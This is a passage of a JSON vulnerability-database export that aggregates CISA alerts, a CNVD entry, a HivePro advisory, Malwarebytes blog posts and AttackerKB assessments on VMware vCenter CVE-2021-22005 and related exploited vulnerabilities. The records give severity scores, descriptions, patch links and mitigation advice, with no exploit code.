CVE-2021-22005,](<https://kb.vmware.com/s/article/85717>) [supplemental blog post,](<https://blogs.vmware.com/vsphere/2021/09/vmsa-2021-0020-what-you-need-to-know.html>) and [frequently asked questions](<https://core.vmware.com/vmsa-2021-0020-questions-answers-faq>) for additional information.\n\nThis product is provided subject to this Notification and this [Privacy & Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2021/09/24/vmware-vcenter-server-vulnerability-cve-2021-22005-under-active>); we'd welcome your feedback.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-24T00:00:00", "type": "cisa", "title": "VMware vCenter Server Vulnerability CVE-2021-22005 Under Active Exploit", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22005"], "modified": "2021-09-24T00:00:00", "id": "CISA:D9F4EE6727B9BF3A40025E9D70945311", "href": "https://us-cert.cisa.gov/ncas/current-activity/2021/09/24/vmware-vcenter-server-vulnerability-cve-2021-22005-under-active", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-01-26T11:28:36", "description": "CISA has added 13 new vulnerabilities to its [Known Exploited Vulnerabilities Catalog](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog >), based on evidence that threat actors are actively exploiting the vulnerabilities listed in the table below. These types of vulnerabilities are a frequent attack vector for malicious cyber actors of all types and pose significant risk to the federal enterprise.\n\n**CVE Number** | **CVE Title** | **Required Action Due Date** \n---|---|--- \nCVE-2021-32648 | October CMS Improper Authentication | 2/1/2022 \nCVE-2021-21315 | System Information Library for node.js Command Injection Vulnerability | 2/1/2022 \nCVE-2021-21975 | Server Side Request Forgery in vRealize Operations Manager API Vulnerability | 2/1/2022 \nCVE-2021-22991 | BIG-IP Traffic Microkernel Buffer Overflow Vulnerability | 2/1/2022 \nCVE-2021-25296 | Nagios XI OS Command Injection Vulnerability | 2/1/2022 \nCVE-2021-25297 | Nagios XI OS Command Injection Vulnerability | 2/1/2022 \nCVE-2021-25298 | Nagios XI OS Command Injection Vulnerability | 2/1/2022 \nCVE-2021-33766 | Microsoft Exchange Server Information Disclosure Vulnerability | 2/1/2022 \nCVE-2021-40870 | Aviatrix Controller Unrestricted Upload of File Vulnerability | 2/1/2022 \nCVE-2020-11978 | Apache Airflow Command Injection Vulnerability | 7/18/2022 \nCVE-2020-13671 | Drupal Core Unrestricted Upload of File Vulnerability | 7/18/2022 \nCVE-2020-13927 | Apache Airflow Experimental API Authentication Bypass Vulnerability | 7/18/2022 \nCVE-2020-14864 | Oracle Corporate Business Intelligence Enterprise Edition Path Traversal Vulnerability | 7/18/2022 \n \n[Binding Operational Directive (BOD) 22-01: Reducing the Significant Risk of Known Exploited Vulnerabilities](<https://www.cisa.gov/binding-operational-directive-22-01>) established the Known Exploited Vulnerabilities Catalog as a living list of known CVEs that carry significant risk to the federal enterprise. BOD 22-01 requires FCEB agencies to remediate identified vulnerabilities by the due date to protect FCEB networks against active threats. See the [BOD 22-01 Fact Sheet](<https://www.cisa.gov/known-exploited-vulnerabilities>) for more information.\n\nAlthough BOD 22-01 only applies to FCEB agencies, CISA strongly urges all organizations to reduce their exposure to cyberattacks by prioritizing timely remediation of [Catalog vulnerabilities](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog >) as part of their vulnerability management practice. CISA will continue to add vulnerabilities to the Catalog that meet the meet the [specified criteria](<https://www.cisa.gov/known-exploited-vulnerabilities >).\n\nThis product is provided subject to this Notification and this [Privacy & Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2022/01/18/cisa-adds-13-known-exploited-vulnerabilities-catalog>); we'd welcome your feedback.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-01-18T00:00:00", "type": "cisa", "title": "CISA Adds 13 Known Exploited Vulnerabilities to Catalog", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-11978", "CVE-2020-13671", "CVE-2020-13927", "CVE-2020-14864", "CVE-2021-21315", "CVE-2021-21975", "CVE-2021-22991", "CVE-2021-25296", "CVE-2021-25297", "CVE-2021-25298", "CVE-2021-32648", "CVE-2021-33766", "CVE-2021-40870"], "modified": "2022-01-25T00:00:00", "id": "CISA:D7385BDD2786721598A2135E182282C2", "href": "https://us-cert.cisa.gov/ncas/current-activity/2022/01/18/cisa-adds-13-known-exploited-vulnerabilities-catalog", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}], "cnvd": [{"lastseen": "2022-11-05T07:36:59", "description": "Vmware VMware vCenter Server is a suite of server and virtualization management software from Vmware, Inc. The software provides a centralized platform for managing VMware vSphere environments, automating the implementation and delivery of virtual infrastructure. vCenter Server is vulnerable to a file upload vulnerability that could be exploited by an attacker to execute code on vCenter Server by uploading specially crafted files.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-24T00:00:00", "type": "cnvd", "title": "VMware vCenter Server File Upload Vulnerability", "bulletinFamily": "cnvd", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22005"], "modified": "2021-12-21T00:00:00", "id": "CNVD-2021-101199", "href": "https://www.cnvd.org.cn/flaw/show/CNVD-2021-101199", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "hivepro": [{"lastseen": "2021-09-28T21:19:09", "description": "#### THREAT LEVEL: Green.\n\nFor a detailed advisory, [download the pdf file here.](<https://www.hivepro.com/wp-content/uploads/2021/09/TA202136.pdf>)\n\nVMware has issued patches for 19 new vulnerabilities. CVE-2021-22005 is the worst of the lot, defined as "an arbitrary file upload vulnerability in the Analytics service" of the vCenter Server. An attacker with network access to vCenter Server's port 443 might use this flaw to execute code on the server by uploading a specially crafted file. VMware also provides a temporary workaround for individuals who are unable to instantly patch their appliances.\n\n#### Vulnerability Details\n\n![](https://www.hivepro.com/wp-content/uploads/2021/09/1-1.png) ![](https://www.hivepro.com/wp-content/uploads/2021/09/2-1.png) ![](https://www.hivepro.com/wp-content/uploads/2021/09/2-2.png)\n\n#### Patch Link\n\n<https://www.vmware.com/security/advisories/VMSA-2021-0020.html>\n\n#### References\n\n<https://blogs.vmware.com/vsphere/2021/09/vmsa-2021-0020-what-you-need-to-know.html>\n\n<https://www.theregister.com/2021/09/22/vmware_emergency_vcenter_patch_recommendation/>", "cvss3": {}, "published": "2021-09-22T13:29:07", "type": "hivepro", "title": "Drop everything and patch VMware\u2019s vCenter Server Vulnerabilities", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-22005"], "modified": "2021-09-22T13:29:07", "id": "HIVEPRO:7E3F7EBD4701369D6F9E6149BFE03AC8", "href": "https://www.hivepro.com/drop-everything-and-patch-vmwares-vcenter-server-vulnerabilities/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "malwarebytes": [{"lastseen": "2021-09-28T20:35:10", "description": "### Last week on Malwarebytes Labs\n\n * Freedom Hosting operator [gets 27 years](<https://blog.malwarebytes.com/cybercrime/2021/09/freedom-hosting-operator-gets-27-years-for-hosting-dark-web-child-abuse-sites/>) for hosting dark web abuse sites\n * Microsoft makes a [bold move](<https://blog.malwarebytes.com/opinion/2021/09/microsoft-makes-a-bold-move-towards-a-password-less-future/>) towards a password-less future\n * New Mac malware masquerades as [iTerm2, remote desktop and other apps](<https://blog.malwarebytes.com/malwarebytes-news/2021/09/new-mac-malware-masquerades-as-iterm2-remote-desktop-and-other-apps/>)\n * Internet safety tips for kids and teens: a [comprehensive guide](<https://blog.malwarebytes.com/how-tos-2/2021/09/internet-safety-tips-for-kids-and-teens-a-comprehensive-guide-for-the-modern-parent/>) for the modern parent\n * Google, geofence warrants, [and you](<https://blog.malwarebytes.com/privacy-2/2021/09/google-geofence-warrants-and-you/>)\n * No, Colonel Gaddafi\u2019s daughter isn\u2019t [emailing to give you untold riches](<https://blog.malwarebytes.com/social-engineering/2021/09/no-colonel-gaddafis-daughter-isnt-emailing-to-give-you-untold-riches/>)\n * Patch vCenter Server \u201c[right now](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/09/patch-vcenter-server-right-now-vmware-expects-cve-2021-22005-exploitation-within-minutes-of-disclosure/>)\u201d, VMWare expects CVE-2021-22005 exploitation within minutes of disclosure\n * [Patch now](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/09/patch-now-insecure-hikvision-security-cameras-can-be-taken-over-remotely/>)! Insecure Hikvision security cameras can be taken over remotely\n * MSHTML [attack targets Russian state rocket centre](<https://blog.malwarebytes.com/reports/2021/09/mshtml-attack-targets-russian-state-rocket-centre-and-interior-ministry/>) and interior ministry\n * Italian mafia cybercrime sting leads to [100+ arrests](<https://blog.malwarebytes.com/scams/2021/09/italian-mafia-cybercrime-sting-leads-to-100-arrests/>)\n * How to [clear your cache](<https://blog.malwarebytes.com/101/how-tos/2021/09/how-to-clear-your-cache/>)\n * Microsoft exchange autodiscover flaw [reveals users\u2019 passwords](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/09/microsoft-exchange-autodiscover-flaw-reveals-users-passwords/>)\n * Parents and teachers believe digital surveillance of kids [outweighs risks](<https://blog.malwarebytes.com/privacy-2/2021/09/parents-and-teachers-believe-digital-surveillance-of-kids-outweighs-risks/>)\n * SonicWall warns users to [patch critical vulnerability](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/09/sonicwall-warns-users-to-patch-critical-vulnerability-as-soon-as-possible/>) \u201cas soon as possible\u201d\n * Beware! Uber scam [lures victims](<https://blog.malwarebytes.com/malwarebytes-news/2021/09/beware-uber-scam-lures-victims-with-alert-from-a-real-uber-number/>) with alert from a real Uber number\n * Teaching [cybersecurity skills to special needs children](<https://blog.malwarebytes.com/malwarebytes-news/2021/09/teaching-cybersecurity-skills-to-special-needs-children-with-alana-robinson-lock-and-code-s02e18/>) with Alana Robinson: Lock and Code S02E18\n\n### Other cybersecurity news\n\n * UK ministry of defence [apologises](<https://www.theregister.com/2021/09/23/afghan_email_fail_ministry_defence/>) - again - after another major email blunder in Afghanistan (Source: The Register)\n * Database containing personal info of 106 million international visitors to Thailand [exposed](<https://www.comparitech.com/blog/information-security/thai-traveler-data-leak/>) online (Source: Comparitech)\n * Fake WhatsApp backup message [delivers malware](<https://portswigger.net/daily-swig/fake-whatsapp-backup-message-delivers-malware-to-spanish-speakers-devices>) to Spanish speakers\u2019 devices (Source: The Daily Swig) \nMobile phones of 5 French cabinet ministers [infected by Pegasus malware](<https://www.france24.com/en/europe/20210924-mobile-phones-of-five-french-cabinet-ministers-infected-by-pegasus-malware>) (Source: France 24)\n * Ransomware dropping malware swaps phishing for [sneaky new attack route](<https://www.zdnet.com/article/this-ransomware-dropping-malware-has-swapped-phishing-for-a-sneaky-new-attack-route/>) (Source: ZDNet)\n * Phishing attacks more sophisticated, malicious emails [time to coincide](<https://www.cpomagazine.com/cyber-security/phishing-attacks-more-sophisticated-malicious-emails-timed-to-coincide-with-periods-of-low-energy-and-inattentiveness/>) with periods of low energy and inattentiveness (Source: CPO magazine)\n * Keeping your data [secure at work](<https://minutehack.com/news/keeping-your-data-secure-at-work>) (Source: Minute Hack)\n\nStay safe, everyone!\n\nThe post [A week in security (Sept 20 \u2013 Sept 26)](<https://blog.malwarebytes.com/a-week-in-security/2021/09/a-week-in-security-sept-20-sept-26-2021/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "cvss3": {}, "published": "2021-09-27T11:01:42", "type": "malwarebytes", "title": "A week in security (Sept 20 \u2013 Sept 26)", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2021-22005"], "modified": "2021-09-27T11:01:42", "id": "MALWAREBYTES:F776F8D86D7BD9350BDC23F1E51B31BF", "href": "https://blog.malwarebytes.com/a-week-in-security/2021/09/a-week-in-security-sept-20-sept-26-2021/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-09-28T20:35:11", "description": "VMware is urging users of vCenter server to patch no fewer than [19 problems](<https://www.vmware.com/security/advisories/VMSA-2021-0020.html>) affecting its products. \n\nThese updates fix a variety of security vulnerabilities, but and one of them is particularly nasty. That would be [CVE-2021-22005](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-22005>), a critical file upload vulnerability with a CVSS score of 9.8 out of 10.\n\nIt's so bad the company is advising users to **sort it out "[right now](<https://blogs.vmware.com/vsphere/2021/09/vmsa-2021-0020-what-you-need-to-know.html>)"**:\n\n> These updates fix a critical security vulnerability, and your response needs to be considered at once. Organizations that practice change management using the ITIL definitions of change types would consider this an \u201cemergency change.\u201d\n\n### CVE-2021-22005\n\nvServer Center is a way to [manage large infrastructure](<https://geek-university.com/vmware-esxi/what-is-vcenter-server/>). If you have lots of hosts and virtual machines, this is a very good way to manage every aspect of your setup. With this in mind, if someone manages to compromise your vCenter, it probably won't end well.\n\nAnd that's exactly what CVE-2021-22005 does. It's a file upload vulnerability and anyone with access to vServer Center over a network can exploit it. The configuration settings of vServer Center don't make any difference. If criminals get network access they can upload a specially made file and use it to execute code on the vServer Center.\n\nAs VMware points out, bad actors are often already in your network. They wait patiently to strike. It's likely they'll exfiltrate data slowly and nobody will ever know they're there. Being able to snag a win like this for themselves could increase the threat from ransomware and other malicious activity.\n\n### What should I do?\n\nWell, patch immediately is definitely the [go-to advice](<https://www.vmware.com/security/advisories/VMSA-2021-0020.html>). If an emergency patch falls outside how you usually do things, VMware mentions, but it really does impress upon readers that patching needs to be done as soon as possible. It is, perhaps, unusual (and refreshing) to see an organisation stress this fact so plainly, so kudos for being so forthright.\n\n### Is my vServer setup affected by this?\n\nIt depends. Some versions, such as vCenter Server 6.5, are not affected. Others are. You should refer to the [dedicated rundown on](<https://core.vmware.com/vmsa-2021-0020-questions-answers-faq>) this issue and take appropriate action as soon as you possibly can. We'll leave the last word to VMware with regard to when you should be patching:\n\n> Immediately, the ramifications of this vulnerability are serious and it is a matter of time \u2013 likely minutes after the disclosure \u2013 before working exploits are publicly available.\n> \n> With the threat of ransomware looming nowadays the safest stance is to assume that an attacker may already have control of a desktop and a user account through the use of techniques like phishing or spearphishing, and act accordingly. This means the attacker may already be able to reach vCenter Server from inside a corporate firewall, and time is of the essence.\n\nThis seems like very good advice.\n\nThe post [Patch vCenter Server "right now", VMWare expects CVE-2021-22005 exploitation within minutes of disclosure](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/09/patch-vcenter-server-right-now-vmware-expects-cve-2021-22005-exploitation-within-minutes-of-disclosure/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "cvss3": {}, "published": "2021-09-22T11:27:11", "type": "malwarebytes", "title": "Patch vCenter Server \u201cright now\u201d, VMWare expects CVE-2021-22005 exploitation within minutes of disclosure", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2021-22005"], "modified": "2021-09-22T11:27:11", "id": "MALWAREBYTES:8791EE404FCD2E2A063F220E6486B422", "href": "https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/09/patch-vcenter-server-right-now-vmware-expects-cve-2021-22005-exploitation-within-minutes-of-disclosure/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-10-14T00:05:09", "description": "In [a joint cybersecurity advisory](<https://www.nsa.gov/Press-Room/Press-Releases-Statements/Press-Release-View/Article/3181261/nsa-cisa-fbi-reveal-top-cves-exploited-by-chinese-state-sponsored-actors/>), the National Security Agency (NSA), the Cybersecurity and Infrastructure Security Agency (CISA), and the Federal Bureau of Investigation (FBI) have revealed the top CVEs used by state-sponsored threat actors from China.\n\nThe advisory aims to \"inform federal and state, local, tribal and territorial (SLTT) government; critical infrastructure, including the Defense Industrial Base Sector; and private sector organizations about notable trends and persistent tactics, techniques, and procedures (TTPs).\"\n\nThe US and other allied nations consider China a cyber threat as it continues to target and attack companies in the US and elsewhere, with the primary aim of stealing intellectual property or gaining access to sensitive networks. The usual targets range from organizations in the IT sector, including telecommunications service providers; the [DIB (Defense Industrial Base)](<https://www.cisa.gov/defense-industrial-base-sector>) sector, which is related to military weapons systems; and other critical infrastructure sectors.\n\nIt is no surprise, then, that a majority of the CVEs revealed are for flaws allowing actors to surreptitiously and unlawfully gain access to networks. Within these networks, they establish persistence and move laterally to other connected systems.\n\nThe advisory is part of a concerted effort by US government agencies, particularly CISA, to push companies into getting on top of their patching. Part of that is getting them to patch much faster, and the other is getting them to focus on patching the vulnerabilities that threat actors are known to use.\n\nLast year, CISA [began publishing a catalog of actively exploited vulnerabilities](<https://www.malwarebytes.com/blog/news/2021/11/cisa-sets-two-week-window-for-patching-serious-vulnerabilities>) that need ot be patched within two weeks on federal information systems. The agencies behind this latest advisory have also collaborated in the past on a list of [vulnerabilities favored by Russian state-sponsored threat actors](<https://www.malwarebytes.com/blog/news/2021/04/patch-now-nsa-cisa-and-fbi-warn-of-russian-intelligence-exploiting-5-vulnerabilities>).\n\nIf your organization's intellectual property is likely to be of interest to China, this is list is for you. And if it isn't, this list is still worth paying attention to.\n\n## The vunerabilities\n\n### Remote code execution (RCE)\n\nRCE flaws let attackers execute malicious code on a compromised, remote computer. The advisory identifies 12 RCEs: [CVE-2021-44228](<https://nvd.nist.gov/vuln/detail/CVE-2021-44228>) (also known as [Log4Shell or LogJam](<https://www.malwarebytes.com/blog/news/2021/12/log4j-zero-day-log4shell-arrives-just-in-time-to-ruin-your-weekend>)), [CVE-2021-22205](<https://www.malwarebytes.com/blog/news/2021/09/patch-vcenter-server-right-now-vmware-expects-cve-2021-22005-exploitation-within-minutes-of-disclosure>), [CVE-2022-26134](<https://www.malwarebytes.com/blog/news/2022/06/unpatched-atlassian-confluence-vulnerability-is-actively-exploited>), [CVE-2021-26855](<https://www.malwarebytes.com/blog/news/2022/03/avoslocker-ransomware-uses-microsoft-exchange-server-vulnerabilities-says-fbi>), [CVE-2020-5902](<https://nvd.nist.gov/vuln/detail/CVE-2020-5902>), [CVE-2021-26084](<https://www.malwarebytes.com/blog/news/2022/04/the-top-5-most-routinely-exploited-vulnerabilities-of-2021>), [CVE-2021-42237](<https://nvd.nist.gov/vuln/detail/CVE-2021-42237>), [CVE-2022-1388](<https://www.malwarebytes.com/blog/news/2022/05/update-now-exploits-are-active-for-f5-big-ip-vulnerability>), [CVE-2021-40539](<https://www.malwarebytes.com/blog/news/2022/04/the-top-5-most-routinely-exploited-vulnerabilities-of-2021>), [CVE-2021-26857](<https://www.malwarebytes.com/blog/news/2022/04/the-top-5-most-routinely-exploited-vulnerabilities-of-2021>), [CVE-2021-26858](<https://www.malwarebytes.com/blog/news/2021/03/patch-now-exchange-servers-attacked-by-hafnium-zero-days>), and [CVE-2021-27065](<https://www.malwarebytes.com/blog/news/2021/03/patch-now-exchange-servers-attacked-by-hafnium-zero-days>).\n\n### Arbitrary file read\n\nThe advisory identifies two arbitrary file read flaws--[CVE-2019-11510](<https://www.malwarebytes.com/blog/business/2019/10/pulse-vpn-patched-their-vulnerability-but-businesses-are-trailing-behind>) and [CVE-2021-22005](<https://www.malwarebytes.com/blog/news/2021/09/patch-vcenter-server-right-now-vmware-expects-cve-2021-22005-exploitation-within-minutes-of-disclosure>)--which allow users or malicious programs with low privileges to read (but not write) any file on the affected system or server. Useful for stealing data.\n\n### Authentication bypass by spoofing\n\n[CVE-2022-24112](<https://nvd.nist.gov/vuln/detail/CVE-2022-24112>) is an authentication bypass flaw that allows attackers to access resources they shouldn't have access to by spoofing an IP address.\n\n### Command injection\n\n[CVE-2021-36260](<https://www.malwarebytes.com/blog/news/2022/08/thousands-of-hikvision-video-cameras-remain-unpatched-and-vulnerable-to-takeover>) is a command injection flaw that allows attackers to execute commands of their own choosing on an affected system. A vulnerable app is usually involved in such attacks.\n\n### Command line execution\n\n[CVE-2021-1497](<https://nvd.nist.gov/vuln/detail/CVE-2021-1497>) is a command injection flaw that allows attackers to inject data into an affected system's command line.\n\n### Path Traversal\n\nAlso known as \"directory traversal,\" these flaws allow attackers to read, and possibly write to, restricted files by inputting path traversal sequences like `../` into file or directory paths. [CVE-2019-19781](<https://www.malwarebytes.com/blog/news/2021/06/atomic-research-institute-breached-via-vpn-vulnerability>), [CVE-2021-41773](<https://www.malwarebytes.com/blog/news/2021/10/apache-http>), and [CVE-2021-20090](<https://www.malwarebytes.com/blog/news/2021/08/home-routers-are-being-hijacked-using-vulnerability-disclosed-just-2-days-ago>) are all forms of path traversal attack.\n\n## Mitigations\n\nThe NSA, CISA, and FBI urge organizations to undertake the following mitigations:\n\n * * Apply patches as they come, prioritizing the most critical l flaws in your environment.\n * Use multi-factor authentication.\n * Require the use of strong, unique passwords.\n * Upgrade or replace software or devices that are at, or close to, their end of life.\n * Consider adopting a [zero-trust security model](<https://www.malwarebytes.com/blog/news/2020/01/explained-the-strengths-and-weaknesses-of-the-zero-trust-model>).\n * Monitor and log Internet-facing systems for abnormal activity.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-10-13T16:15:00", "type": "malwarebytes", "title": "Chinese APT's favorite vulnerabilities revealed", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-11510", "CVE-2019-19781", "CVE-2020-5902", "CVE-2021-1497", "CVE-2021-20090", "CVE-2021-22005", "CVE-2021-22205", "CVE-2021-26084", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065", "CVE-2021-36260", "CVE-2021-40539", "CVE-2021-41773", "CVE-2021-42237", "CVE-2021-44228", "CVE-2022-1388", "CVE-2022-24112", "CVE-2022-26134"], "modified": "2022-10-13T16:15:00", "id": "MALWAREBYTES:D081BF7F95E3F31C6DB8CEF9AD86BD0D", "href": "https://www.malwarebytes.com/blog/news/2022/10/psa-chinese-apts-target-flaws-that-take-full-control-of-systems", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "attackerkb": [{"lastseen": "2023-05-27T14:33:30", "description": "Arbitrary file write vulnerability in vRealize Operations Manager API (CVE-2021-21983) prior to 8.4 may allow an authenticated malicious actor with network access to the vRealize Operations Manager API can write files to arbitrary locations on the underlying photon operating system.\n\n \n**Recent assessments:** \n \n**wvu-r7** at April 03, 2021 7:41am UTC reported:\n\nPlease see [CVE-2021-21975\u2019s Rapid7 analysis](<https://attackerkb.com/topics/51Vx3lNI7B/cve-2021-21975#rapid7-analysis>). CVE-2021-21975 can be chained with CVE-2021-21983 to achieve unauthed RCE.\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 5\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-03-31T00:00:00", "type": "attackerkb", "title": "CVE-2021-21983", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 8.5, "vectorString": "AV:N/AC:L/Au:S/C:N/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 9.2, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21975", "CVE-2021-21983"], "modified": "2021-04-06T00:00:00", "id": "AKB:8B7D69F2-01FB-4346-8A49-EE255BAFFDA8", "href": "https://attackerkb.com/topics/uzsEZjT0Sc/cve-2021-21983", "cvss": {"score": 8.5, "vector": "AV:N/AC:L/Au:S/C:N/I:C/A:C"}}, {"lastseen": "2023-05-27T14:37:37", "description": "Server Side Request Forgery in vRealize Operations Manager API (CVE-2021-21975) prior to 8.4 may allow a malicious actor with network access to the vRealize Operations Manager API can perform a Server Side Request Forgery attack to steal administrative credentials.\n\n \n**Recent assessments:** \n \n**wvu-r7** at March 31, 2021 10:35pm UTC reported:\n\nPlease see the [Rapid7 analysis](<https://attackerkb.com/topics/51Vx3lNI7B/cve-2021-21975#rapid7-analysis>) or [CVE-2021-21983\u2019s assessment](<https://attackerkb.com/assessments/fce71f33-eb17-490f-a80e-c4cd5059e0dc>).\n\n**Update:** According to GreyNoise, [attackers are scanning for CVE-2021-21975](<https://twitter.com/nathanqthai/status/1379888484865957891>).\n\nAssessed Attacker Value: 5 \nAssessed Attacker Value: 5Assessed Attacker Value: 5\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-03-31T00:00:00", "type": "attackerkb", "title": "CVE-2021-21975", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 8.5, 